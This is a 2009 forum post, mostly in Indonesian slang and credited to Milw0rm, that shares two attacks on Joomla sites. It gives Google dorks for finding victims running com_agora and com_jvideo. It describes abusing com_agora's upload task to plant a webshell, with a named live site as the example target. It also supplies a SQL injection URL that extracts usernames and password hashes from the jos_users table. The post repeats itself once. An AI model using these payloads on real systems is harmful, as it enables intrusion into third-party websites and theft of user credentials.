Joomla Component Vuln
Posted: Mon Jun 08, 2009 8:38 pm
Courtesy Milw0rm.com
Just Share vuln On joomla CMS
I
1. Find viktim om google,
dgn dork
inurl:option=com_agora
2.setelah dapet viktimnya, loe masukan exploitnya :
index.php?option=com_agora&task=upload
misalnya :
http://40kwarzone.com/index.php?option= ... ask=upload
3.Browse webshell yg kita punya
4.Kalau sukses ganti urlnya jadi gini
components/com_agora/img/members/0/
misalnya :
http://40kwarzone.com/components/com_ag ... members/0/ [shell yg kita upload ]
II
type in google with dork :
inurl:option=com_jvideo or
inurl:com_jvideo
masukin exploitnya
index.php?option=com_jvideo&view=user&user_id=62+and%201=2+union+select+concat(username,0x3a,password)+from+jos_users
semoga bermanfaat
Just Share vuln On joomla CMS
I
1. Find viktim om google,
dgn dork
inurl:option=com_agora
2.setelah dapet viktimnya, loe masukan exploitnya :
index.php?option=com_agora&task=upload
misalnya :
http://40kwarzone.com/index.php?option= ... ask=upload
3.Browse webshell yg kita punya
4.Kalau sukses ganti urlnya jadi gini
components/com_agora/img/members/0/
misalnya :
http://40kwarzone.com/components/com_ag ... members/0/ [shell yg kita upload ]
II
type in google with dork :
inurl:option=com_jvideo or
inurl:com_jvideo
masukin exploitnya
index.php?option=com_jvideo&view=user&user_id=62+and%201=2+union+select+concat(username,0x3a,password)+from+jos_users
semoga bermanfaat
wew keren neh